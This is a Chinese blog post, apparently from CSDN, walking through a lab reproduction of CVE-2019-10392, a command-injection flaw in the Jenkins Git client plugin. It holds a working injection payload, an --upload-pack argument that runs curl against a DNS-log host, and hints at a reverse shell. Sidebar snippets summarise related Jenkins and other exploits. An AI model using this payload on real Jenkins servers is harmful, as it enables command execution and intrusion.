客户端插件_CVE-2019-10392:Jenkins Git client插件RCE复现

最新推荐文章于 2022-06-02 14:07:47 发布
最新推荐文章于 2022-06-02 14:07:47 发布
阅读量195 收藏
点赞数
文章标签: 客户端插件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39771260/article/details/112732853
版权

0x00 简介

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。

0x01 漏洞概述

Git客户端插件中的系统命令执行漏洞,这是以允许具有Job/Configure权限的攻击者在Jenkins主服务器上执行任意系统命令作为Jenkins进程正在运行的OS用户的方式实现命令执行。

0x02 影响范围

Git client Plugin <= 2.8.4

0x03 环境搭建

在线环境获取:

将本文转发至朋友圈截图发至公众号内

自行搭建:

使用docker进行搭建

docker search Jenkins
docker pull jenkins/jenkins
docker run -d -p 8080:8080 -p 50000:50000 jenkins/jenkins

97830588269e65424edf1ff594dd47cc.png

等待1~2分钟后(启动较慢),浏览器访问ip:8080进入环境

833397e4fa6564e67856f1f276a9679c.png 
docker exec -it 2d0c55ad015c /bin/bash   #进入容器
cat /var/jenkins_home/secrets/initialAdminPassword   #获取密码

e8ced1594248ffe785b4b2e2e4b56102.png

输入密码后继续下一步,安装推荐的插件,这个安装过程要花比较长的时间,15~20分钟

818ef821356e8dcd1a44edb7059e951a.png

继续下一步,创建一个管理员

8055e21f0a5223df8c067574906fc588.png

继续下一步,就进入了Jenkins主页面

系统管理 -- 管理用户 -- 新建用户,创建一个user账户

6982080f476f0d5dd8ad21e62cf16c0a.png

然后进入:系统管理 -- 全局安全配置,为user账户配置如下权限

f86cb041d48335fc1a0cd16faa69cf73.png

下载漏洞版本的插件(推荐安装的都是官网的最新版本)

git客户端:

http://updates.jenkins-ci.org/download/plugins/git-client/2.8.2/git-client.hpi

git插件:

http://updates.jenkins-ci.org/download/plugins/git/3.12.0/git.hpi

然后进入:系统管理 -- 插件管理 -- 高级,将两个插件上传

972a54d0e72ee1ee735365f33e9cd41c.png

都上传完后点击下图的‘安装完成后重启Jenkins’即可重新启动服务

853a4f51880b007e70be0234f5c891fd.png

0x04 漏洞利用

重启后,登录user账户

新建任务 -- 流水线

bedd364ddb20c1adc22417ff4c831fea.png

确定后,点击流水线

518632c8e012d6a5a4f522dd41edeb4b.png

选择以下选项,输入Poc(使用dnslog检测):

--upload-pack="`curl ysp8lf.dnslog.cn`"

378c6ae0ebff2bd4a1543c98721181e3.png

查看dnslog,检测到流量

f008f84668344cb89e4dfac2ee2b6c9a.png

反弹shell后便可以做你想做的任何事情了/坏笑

Poc脚本:

https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

参考链接:

Jenkins Git client插件命令执行漏洞(CVE-2019-10392)

欢迎关注团队公众号:Timeline Sec

weixin_39771260
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-1003000 Jenkins RCE 复现
prettyX的博客
06-18 1901
过程 前提,在Kali下安装好docker 准备漏洞环境 git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc pip install -r requirements.txt cd sample-vuln ./run.sh 在进行完上述命令之后,通过如下命令 docker ps 并未发现docker运行实例 通过查.
git-client-plugin:Jenkins git客户端插件
03-10
Git客户端插件 介绍 git客户端插件Jenkins插件提供了git应用程序编程接口(API)。 它可以获取,签出,分支,列出,合并和标记存储库。 有关特定的API详细信息,请参阅。 提供了git访问的主要入口点。 它支持使用HTTP和HTTPS协议访问git存储库的用户名/密码凭据(例如, https://github.com/jenkinsci/git-client-plugin或http://git.example.com/your-repo.git )。 它支持使用SSH协议访问git存储库的私钥凭据(例如git@github.com:jenkinsci/git-client-plugin.git或ssh://git@github.com/jenkinsci/git-client-plugin.git )。 提供了凭证支持。 Changelog 自git客户端插件2
漏洞复现----1、Jenkins Git Client插件命令执行漏洞(CVE-2019-10392)
七天
12-02 2458
CVE-2019-10392
jenkins 增量发布插件_文末附操作实践 | Jenkins远程代码执行漏洞(CVE-2019-1003000)复现...
weixin_39774219的博客
12-09 196
t-img合天智汇安全预警2019年1月8日,Jenkins官方发布了一则ScriptSecurity and Pipeline插件远程代码执行漏洞的安全公告,漏洞CVE编号为:CVE-2019-1003000,官方定级为高危。2019年2月15日,网上公布了该漏洞的利用方式,该漏洞允许具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxedPip...
jenkins rec cve-2019-1003000 复现
whatday的专栏
07-19 1294
0X1 漏洞预警 2019年1月8日,Jenkins官方发布了一则Script Security and Pipeline 插件远程代码执行漏洞的安全公告,漏洞CVE编号为:CVE-2019-1003000,官方定级为高危。2019年2月15日,网上公布了该漏洞的利用方式,该漏洞允许具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxed Pipeline共享库内容的用户绕过沙盒保护并在Jenkins主服务器上执行任意代码。 Jenkins是一个开源软件
weblogic_cve-2019-2888:weblogic_cve-2019-2888
03-09
1)开启XXER工具python xxer.py -H 192.168.17.223 2)将xxer的poc放到xx.xml文件中,替换序列化后的数据,注入xxer的poc; java -jar weblogic_xxe.jar xx.xml 3)使用java-deserialization-exploit工具中的...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
SECURITY-1266 / CVE-2019-1003000(脚本安全性),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明性) 一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的...
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)1
08-04
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)Jenkins Git client插件命令执行漏洞(CVE-2019-10
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
Jackson_RCE-CVE-2019-12384:CVE-2019-12384 漏洞测试环境
05-26
环境搭建 将项目导入到idea,再配置好maven之后设置自动导入依赖库,然后在本地的web空目录写入如下文件,保存为exec.sql。...CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd)...
Jenkins RCE 漏洞(CVE-2019-1003000) 复现
锋刃科技的博客
09-24 3431
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
Jenkins RCE CVE-2019-1003000 漏洞复现
weixin_34102807的博客
02-21 1300
0x00 简述 拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码CVE-2019-1003000 (Script Security)CVE-2019-1003001 (Pipeline: Groovy)CVE-2019-1003002 (Pipeline: Declarative) 0x01 受影响的版本 Pipeline: Declarative Plu...
CVE-2022-1329 WordPress 500万量级插件 Elementor 远程命令执行漏洞分析
include_voidmain的博客
06-02 1212
CVE-2022-1329 WordPress 500万量级插件 Elementor 远程命令执行漏洞分析
CVE-2021-39348 WordPress LearnPress插件XSS漏洞复现
灵墟精_lxj的博客
12-16 3404
WordPress的LearnPress插件(LearnPress < 4.1.3.2版本)中存在一个xss漏洞。本文将从搭建wordpress开始,复现CVE-2021-39348这个漏洞。
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 2776
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
CVE-2019-0726:Win10 DHCP客户端RCE漏洞
systemino的博客
05-01 568
2019年1月,微软发布补丁修复了Windows系统中DHCP客户端的一个漏洞。攻击者可以发送伪造的DHCP响应来在受影响的系统上获取代码。引发该漏洞的根本原因在于可能导致DHCP客户端服务分配长度为0的堆缓存的恶意Domain Search选项。因为该缓存的长度为0,所以写入该缓冲区就会导致越界。 漏洞分析 Trend Micro研究人员Saran Neti发现了该漏洞的一个新变种。在新变种...
Jenkins未授权访问RCE漏洞复现
公众号shadow sock7
02-22 1133
修改默认端口: java -jar jenkins.war --ajp13Port=-1 --httpPort=8081
重生之我是赏金猎人(四)-记一次有趣的客户端RCE+服务端XXE挖掘
weixin_44948325的博客
03-26 347
0x00 项目背景 该系列旨在分享自己和团队在SRC、项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸。 该系列首发github:https://github.com/J0o1ey/BountyHunterInChina 本项目由M78sec维护,未经授权,文章严禁私自修改版权转载。 0x01 起因 朋友给某甲⽅做渗透测试,奈何甲⽅是某知名保险,系统太耐⺾,半天不出货兄弟喊我来⼀块来看,于是有了本⽂ 0x02 客户端RCE⼀处 客户端RCE⼀处 朋友把靶标发给我看
[CVE-2019-1003000]Jenkins Sandbox Bypass in Script Security and Pipeline Plugins
公众号shadow sock7
05-06 391
参考: https://www.jenkins.io/security/advisory/2019-01-08/ https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc https://www.exploit-db.com/exploits/46453 https://blog.51cto.com/13770310/235274...
Tomact_CVE-2020-1938漏洞复现
最新发布
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值